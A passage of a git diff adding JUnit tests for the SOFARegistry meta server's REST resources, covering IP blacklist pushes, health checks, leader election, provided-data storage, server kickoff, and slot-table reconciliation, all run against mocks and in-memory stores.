Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.provide.data.DefaultProvideDataNotifier; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class BlacklistDataResourceTest extends AbstractMetaServerTestBase { + + private BlacklistDataResource resource; + + private ProvideDataService provideDataService = spy(new InMemoryProvideDataRepo()); + + private DefaultProvideDataNotifier dataNotifier; + + @Before + public void before() { + dataNotifier = mock(DefaultProvideDataNotifier.class); + resource = + new BlacklistDataResource() + .setProvideDataNotifier(dataNotifier) + .setProvideDataService(provideDataService); + } + + @Test + public void testBlacklistPush() { + resource.blacklistPush( + "{\"FORBIDDEN_PUB\":{\"IP_FULL\":[\"1.1.1.1\",\"10.15.233.150\"]},\"FORBIDDEN_SUB_BY_PREFIX\":{\"IP_FULL\":[\"1.1.1.1\"]}}"); + verify(dataNotifier, times(1)).notifyProvideDataChange(any()); + Assert.assertNotNull(provideDataService.queryProvideData(ValueConstants.BLACK_LIST_DATA_ID)); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/HealthResourceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/HealthResourceTest.java new file mode 100644 index 000000000..f1639ed6e --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/HealthResourceTest.java @@ -0,0 +1,79 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerBootstrap; +import com.alipay.sofa.registry.server.meta.metaserver.CurrentDcMetaServer; +import javax.ws.rs.core.Response; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class HealthResourceTest { + + private Logger logger = LoggerFactory.getLogger(HealthResourceTest.class); + + private HealthResource healthResource; + + @Mock private MetaServerBootstrap metaServerBootstrap; + + @Mock private MetaLeaderService metaLeaderService; + + @Mock private CurrentDcMetaServer currentDcMetaServer; + + @Before + public void beforeHealthResourceTest() { + MockitoAnnotations.initMocks(this); + healthResource = + new HealthResource() + .setCurrentDcMetaServer(currentDcMetaServer) + .setMetaLeaderService(metaLeaderService) + .setMetaServerBootstrap(metaServerBootstrap); + } + + @Test + public void testCheckHealth() { + when(metaServerBootstrap.isRpcServerForSessionStarted()).thenReturn(false); + when(metaServerBootstrap.isHttpServerStarted()).thenReturn(false); + when(metaServerBootstrap.isRpcServerForMetaStarted()).thenReturn(false); + Response response = healthResource.checkHealth(); + Assert.assertEquals( + Response.Status.INTERNAL_SERVER_ERROR.getStatusCode(), response.getStatus()); + + when(metaServerBootstrap.isRpcServerForSessionStarted()).thenReturn(true); + when(metaServerBootstrap.isHttpServerStarted()).thenReturn(true); + when(metaServerBootstrap.isRpcServerForMetaStarted()).thenReturn(true); + when(metaServerBootstrap.isRpcServerForDataStarted()).thenReturn(true); + when(currentDcMetaServer.getClusterMembers()) + .thenReturn(Lists.newArrayList(new MetaNode(new URL("127.0.0.1"), "dc"))); + + when(metaLeaderService.getLeader()).thenReturn("127.0.0.1"); + response = healthResource.checkHealth(); + Assert.assertEquals(200, response.getStatus()); + logger.info("[testCheckHealth] {}", response); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/MetaDigestResourceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/MetaDigestResourceTest.java new file mode 100644 index 000000000..1cc981316 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/MetaDigestResourceTest.java @@ -0,0 +1,97 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.metaserver.impl.DefaultMetaServerManager; +import com.alipay.sofa.registry.server.meta.provide.data.DefaultProvideDataNotifier; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class MetaDigestResourceTest { + + private MetaDigestResource metaDigestResource; + + private StopPushDataResource stopPushDataResource; + + private DefaultMetaServerManager metaServerManager; + + private DefaultProvideDataNotifier dataNotifier; + + private ProvideDataService provideDataService = + spy(new AbstractMetaServerTestBase.InMemoryProvideDataRepo()); + + @Before + public void beforeMetaDigestResourceTest() { + dataNotifier = mock(DefaultProvideDataNotifier.class); + stopPushDataResource = + new StopPushDataResource() + .setProvideDataNotifier(dataNotifier) + .setProvideDataService(provideDataService); + metaDigestResource = + new MetaDigestResource() + .setProvideDataService(provideDataService) + .setMetaServerManager(metaServerManager); + } + + @Test(expected = RuntimeException.class) + public void testGetRegisterNodeByType() { + metaDigestResource.getRegisterNodeByType(Node.NodeType.META.name()); + verify(metaServerManager, times(1)).getSummary(Node.NodeType.META); + metaDigestResource.getRegisterNodeByType(Node.NodeType.DATA.name()); + verify(metaServerManager, times(1)).getSummary(Node.NodeType.DATA); + metaDigestResource.getRegisterNodeByType(Node.NodeType.SESSION.name()); + verify(metaServerManager, times(1)).getSummary(Node.NodeType.SESSION); + when(metaServerManager.getSummary(any())) + .thenThrow(new SofaRegistryRuntimeException("expected exception")); + metaDigestResource.getRegisterNodeByType(Node.NodeType.SESSION.name()); + } + + @Test + public void testGetPushSwitch() { + String key = "stopPush"; + String val = metaDigestResource.getPushSwitch().get(key); + Assert.assertNull(val); + + DataInfo dataInfo = DataInfo.valueOf(ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID); + PersistenceData persistenceData = new PersistenceData(); + persistenceData.setDataId(dataInfo.getDataId()); + persistenceData.setGroup(dataInfo.getGroup()); + persistenceData.setInstanceId(dataInfo.getInstanceId()); + persistenceData.setVersion(System.currentTimeMillis()); + provideDataService.saveProvideData(persistenceData); + val = metaDigestResource.getPushSwitch().get(key); + Assert.assertNull(val); + + stopPushDataResource.closePush(); + val = metaDigestResource.getPushSwitch().get(key); + Assert.assertEquals("true", val); + + stopPushDataResource.openPush(); + val = metaDigestResource.getPushSwitch().get(key); + Assert.assertEquals("false", val); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/MetaLeaderResourceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/MetaLeaderResourceTest.java new file mode 100644 index 000000000..61ee8d0f5 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/MetaLeaderResourceTest.java @@ -0,0 +1,75 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.elector.LeaderInfo; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.store.api.elector.LeaderElector; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class MetaLeaderResourceTest { + + private MetaLeaderResource resource; + + @Mock private MetaLeaderService metaLeaderService; + + @Mock private LeaderElector leaderElector; + + @Before + public void beforeMetaLeaderResourceTest() { + MockitoAnnotations.initMocks(this); + resource = + new MetaLeaderResource() + .setLeaderElector(leaderElector) + .setMetaLeaderService(metaLeaderService); + } + + @Test + public void testQueryLeader() { + when(metaLeaderService.getLeader()).thenReturn("127.0.0.1"); + GenericResponse response = resource.queryLeader(); + Assert.assertTrue(response.isSuccess()); + Assert.assertEquals("127.0.0.1", response.getData().getLeader()); + + when(metaLeaderService.getLeader()) + .thenThrow(new SofaRegistryRuntimeException("expected exception")); + response = resource.queryLeader(); + Assert.assertFalse(response.isSuccess()); + } + + @Test + public void testQuitLeader() { + CommonResponse response = resource.quitElection(); + Assert.assertTrue(response.isSuccess()); + verify(leaderElector, times(1)).change2Observer(); + + doThrow(new SofaRegistryRuntimeException("expected exception")) + .when(leaderElector) + .change2Observer(); + response = resource.quitElection(); + Assert.assertFalse(response.isSuccess()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/ProvideDataResourceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/ProvideDataResourceTest.java new file mode 100644 index 000000000..fc86955e4 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/ProvideDataResourceTest.java @@ -0,0 +1,116 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.provide.data.DefaultProvideDataNotifier; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.store.api.DBResponse; +import com.alipay.sofa.registry.store.api.OperationStatus; +import java.util.concurrent.TimeoutException; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +/** + * @author zhuchen + * @date Apr 6, 2021, 7:45:13 PM + */ +public class ProvideDataResourceTest extends AbstractMetaServerTestBase { + + private ProvideDataResource provideDataResource; + + private DefaultProvideDataNotifier dataNotifier; + + private ProvideDataService provideDataService = spy(new InMemoryProvideDataRepo()); + + @Before + public void beforeProvideDataResourceTest() { + dataNotifier = mock(DefaultProvideDataNotifier.class); + provideDataResource = + new ProvideDataResource() + .setProvideDataNotifier(dataNotifier) + .setProvideDataService(provideDataService); + } + + @Test + public void testPut() { + PersistenceData persistenceData = new PersistenceData(); + persistenceData.setData("SampleWord"); + persistenceData.setDataId("dataId"); + persistenceData.setGroup("group"); + persistenceData.setInstanceId("InstanceId"); + persistenceData.setVersion(1000L); + provideDataResource.put(persistenceData); + String dataInfoId = + DataInfo.toDataInfoId( + persistenceData.getDataId(), + persistenceData.getInstanceId(), + persistenceData.getGroup()); + verify(dataNotifier, times(1)).notifyProvideDataChange(any()); + DBResponse response = provideDataService.queryProvideData(dataInfoId); + Assert.assertEquals(OperationStatus.SUCCESS, response.getOperationStatus()); + Assert.assertEquals(persistenceData, response.getEntity()); + } + + @Test + public void testRemove() { + PersistenceData persistenceData = new PersistenceData(); + persistenceData.setData("SampleWord"); + persistenceData.setDataId("dataId"); + persistenceData.setGroup("group"); + persistenceData.setInstanceId("InstanceId"); + persistenceData.setVersion(1000L); + provideDataResource.put(persistenceData); + String dataInfoId = + DataInfo.toDataInfoId( + persistenceData.getDataId(), + persistenceData.getInstanceId(), + persistenceData.getGroup()); + DBResponse response = provideDataService.queryProvideData(dataInfoId); + Assert.assertEquals(OperationStatus.SUCCESS, response.getOperationStatus()); + + PersistenceData other = new PersistenceData(); + other.setData(persistenceData.getData()); + other.setDataId(persistenceData.getDataId()); + other.setGroup(persistenceData.getGroup()); + other.setInstanceId(persistenceData.getInstanceId()); + other.setVersion(persistenceData.getVersion()); + provideDataResource.remove(other); + response = provideDataService.queryProvideData(dataInfoId); + verify(dataNotifier, atLeast(1)).notifyProvideDataChange(any()); + Assert.assertEquals(OperationStatus.NOTFOUND, response.getOperationStatus()); + } + + @Test(expected = RuntimeException.class) + public void testWhenProvideDataAccessFail() { + + when(provideDataService.saveProvideData(mockPersistenceData())) + .thenThrow(new TimeoutException("expected exception")); + PersistenceData persistenceData = new PersistenceData(); + persistenceData.setData("SampleWord"); + persistenceData.setDataId("dataId"); + persistenceData.setGroup("group"); + persistenceData.setInstanceId("InstanceId"); + persistenceData.setVersion(1000L); + provideDataResource.put(persistenceData); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/RegistryCoreOpsResourceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/RegistryCoreOpsResourceTest.java new file mode 100644 index 000000000..3889eae0c --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/RegistryCoreOpsResourceTest.java @@ -0,0 +1,102 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import static org.mockito.Mockito.doThrow; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.spy; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.lease.filter.DefaultForbiddenServerManager; +import com.alipay.sofa.registry.server.meta.lease.filter.RegistryForbiddenServerManager; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.store.api.DBResponse; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class RegistryCoreOpsResourceTest extends AbstractMetaServerTestBase { + + private RegistryForbiddenServerManager registryForbiddenServerManager; + + private RegistryCoreOpsResource resource; + + private ProvideDataService provideDataService = spy(new InMemoryProvideDataRepo()); + + @Before + public void before() { + registryForbiddenServerManager = new DefaultForbiddenServerManager(provideDataService); + resource = + new RegistryCoreOpsResource() + .setRegistryForbiddenServerManager(registryForbiddenServerManager); + } + + @Test + public void testKickoffServer() { + CommonResponse response = resource.kickoffServer("fakeip"); + Assert.assertFalse(response.isSuccess()); + Assert.assertEquals("invalid ip address: fakeip", response.getMessage()); + + response = resource.kickoffServer("127.0.0.1"); + Assert.assertTrue(response.isSuccess()); + Assert.assertFalse( + registryForbiddenServerManager.allowSelect(new Lease<>(new SimpleNode("127.0.0.1"), 100))); + } + + @Test + public void testKickoffServerException() { + ProvideDataService provideDataService = mock(ProvideDataService.class); + registryForbiddenServerManager = new DefaultForbiddenServerManager(provideDataService); + resource = + new RegistryCoreOpsResource() + .setRegistryForbiddenServerManager(registryForbiddenServerManager); + + when(provideDataService.queryProvideData(ValueConstants.REGISTRY_SERVER_BLACK_LIST_DATA_ID)) + .thenReturn(DBResponse.notfound().build()); + + doThrow(new SofaRegistryRuntimeException("expected")) + .when(provideDataService) + .saveProvideData(mockPersistenceData(), System.currentTimeMillis()); + CommonResponse response = resource.kickoffServer("127.0.0.1"); + Assert.assertFalse(response.isSuccess()); + } + + @Test + public void testRejoinServerGroup() { + CommonResponse response = resource.rejoinServerGroup("fakeip"); + Assert.assertFalse(response.isSuccess()); + Assert.assertEquals("invalid ip address: fakeip", response.getMessage()); + + Assert.assertTrue( + registryForbiddenServerManager.allowSelect(new Lease<>(new SimpleNode("127.0.0.1"), 100))); + + response = resource.kickoffServer("127.0.0.1"); + Assert.assertTrue(response.isSuccess()); + Assert.assertFalse( + registryForbiddenServerManager.allowSelect(new Lease<>(new SimpleNode("127.0.0.1"), 100))); + + response = resource.rejoinServerGroup("127.0.0.1"); + Assert.assertTrue(response.isSuccess()); + Assert.assertTrue( + registryForbiddenServerManager.allowSelect(new Lease<>(new SimpleNode("127.0.0.1"), 100))); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/SlotSyncResourceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/SlotSyncResourceTest.java new file mode 100644 index 000000000..c5bb190c9 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/SlotSyncResourceTest.java @@ -0,0 +1,45 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import static org.mockito.Mockito.spy; + +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import java.util.Map; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class SlotSyncResourceTest extends AbstractMetaServerTestBase { + + private SlotSyncResource slotSyncResource; + + private ProvideDataService provideDataService = spy(new InMemoryProvideDataRepo()); + + @Before + public void before() { + slotSyncResource = new SlotSyncResource().setProvideDataService(provideDataService); + } + + @Test + public void testGetSlotSync() throws Exception { + Map result = slotSyncResource.getSlotSync(); + Assert.assertEquals("null", result.get("syncSessionIntervalSec")); + Assert.assertEquals("null", result.get("dataDatumExpire")); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/SlotTableResourceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/SlotTableResourceTest.java new file mode 100644 index 000000000..4e67a26f9 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/SlotTableResourceTest.java @@ -0,0 +1,197 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.lease.data.DefaultDataServerManager; +import com.alipay.sofa.registry.server.meta.monitor.SlotTableMonitor; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.server.meta.slot.arrange.ScheduledSlotArranger; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManager; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import java.util.List; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +/** + * @author zhuchen + * @date Mar 2, 2021, 11:48:41 AM + */ +public class SlotTableResourceTest extends AbstractMetaServerTestBase { + + private SlotManager slotManager; + + private DefaultDataServerManager dataServerManager; + + private SlotTableResource resource; + + private ScheduledSlotArranger slotArranger; + + private SlotTableMonitor slotTableMonitor; + + @Before + public void beforeSlotTableResourceTest() { + NodeConfig nodeConfig = mock(NodeConfig.class); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + slotManager = new SimpleSlotManager(); + dataServerManager = mock(DefaultDataServerManager.class); + slotTableMonitor = mock(SlotTableMonitor.class); + slotArranger = + spy( + new ScheduledSlotArranger( + dataServerManager, slotManager, slotTableMonitor, metaLeaderService)); + resource = + new SlotTableResource( + slotManager, slotTableMonitor, dataServerManager, slotArranger, metaLeaderService); + } + + @Test + public void testForceRefreshSlotTable() throws TimeoutException, InterruptedException { + makeMetaLeader(); + List dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + SlotTable slotTable = new SlotTableGenerator(dataNodes).createLeaderUnBalancedSlotTable(); + slotManager.refresh(slotTable); + + when(slotArranger.tryLock()).thenReturn(true); + GenericResponse current = resource.forceRefreshSlotTable(); + printSlotTable(current.getData()); + Assert.assertTrue(isSlotTableBalanced(slotManager.getSlotTable(), dataNodes)); + } + + @Test + public void testForceRefreshSlotTableWithoutLock() throws TimeoutException, InterruptedException { + makeMetaLeader(); + List dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + SlotTable slotTable = new SlotTableGenerator(dataNodes).createLeaderUnBalancedSlotTable(); + slotManager.refresh(slotTable); + + when(slotArranger.tryLock()).thenReturn(false); + GenericResponse current = resource.forceRefreshSlotTable(); + Assert.assertFalse(current.isSuccess()); + Assert.assertEquals("scheduled slot arrangement is running", current.getMessage()); + + makeMetaNonLeader(); + when(slotArranger.tryLock()).thenReturn(true); + current = resource.forceRefreshSlotTable(); + Assert.assertFalse(current.isSuccess()); + Assert.assertEquals("not the meta-server leader", current.getMessage()); + } + + @Test + public void testStartReconcile() throws Exception { + slotArranger.postConstruct(); + slotArranger.suspend(); + resource.startSlotTableReconcile(); + Assert.assertEquals("running", resource.getReconcileStatus().getMessage()); + } + + @Test + public void testStopReconcile() throws Exception { + slotArranger.postConstruct(); + resource.stopSlotTableReconcile(); + Assert.assertEquals("stopped", resource.getReconcileStatus().getMessage()); + } + + @Test + public void testGetDataStats() { + when(dataServerManager.getDataServersStats()) + .thenThrow(new SofaRegistryRuntimeException("expected exception")); + GenericResponse response = resource.getDataSlotStatuses(); + Assert.assertEquals("expected exception", response.getMessage()); + } + + @Test + public void testReconcileException() { + doThrow(new SofaRegistryRuntimeException("expected exception")).when(slotArranger).resume(); + CommonResponse response = resource.startSlotTableReconcile(); + Assert.assertFalse(response.isSuccess()); + Assert.assertEquals("expected exception", response.getMessage()); + + doThrow(new SofaRegistryRuntimeException("expected exception")).when(slotArranger).suspend(); + response = resource.stopSlotTableReconcile(); + Assert.assertFalse(response.isSuccess()); + Assert.assertEquals("expected exception", response.getMessage()); + } + + @Test + public void testGetSlotStatus() { + when(slotTableMonitor.isStableTableStable()).thenReturn(true); + List dataNodes = randomDataNodes(3); + SlotTable slotTable = randomUnBalancedSlotTable(dataNodes); + slotManager.refresh(slotTable); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + GenericResponse response = resource.getSlotTableStatus(); + Assert.assertTrue(response.isSuccess()); + SlotTableResource.SlotTableStatusResponse slotTableStatus = + (SlotTableResource.SlotTableStatusResponse) response.getData(); + Assert.assertFalse(slotTableStatus.isSlotTableBalanced()); + Assert.assertTrue(slotTableStatus.isSlotTableStable()); + + dataNodes = randomDataNodes(2); + slotTable = randomUnBalancedSlotTable(dataNodes); + slotManager.refresh(slotTable); + dataNodes.add(new DataNode(randomURL(randomIp()), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + response = resource.getSlotTableStatus(); + Assert.assertTrue(response.isSuccess()); + slotTableStatus = (SlotTableResource.SlotTableStatusResponse) response.getData(); + Assert.assertFalse(slotTableStatus.isSlotTableBalanced()); + Assert.assertTrue(slotTableStatus.isSlotTableStable()); + } + + @Test + public void testGetSlotStatusWithException() { + when(slotTableMonitor.isStableTableStable()).thenReturn(true); + List dataNodes = randomDataNodes(3); + SlotTable slotTable = randomUnBalancedSlotTable(dataNodes); + slotManager.refresh(slotTable); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + GenericResponse response = resource.getSlotTableStatus(); + Assert.assertTrue(response.isSuccess()); + SlotTableResource.SlotTableStatusResponse slotTableStatus = + (SlotTableResource.SlotTableStatusResponse) response.getData(); + Assert.assertFalse(slotTableStatus.isSlotTableBalanced()); + Assert.assertTrue(slotTableStatus.isSlotTableStable()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/StopPushDataResourceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/StopPushDataResourceTest.java new file mode 100644 index 000000000..9e956c025 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/StopPushDataResourceTest.java @@ -0,0 +1,86 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import static org.mockito.Mockito.any; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.spy; +import static org.mockito.Mockito.times; +import static org.mockito.Mockito.verify; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; 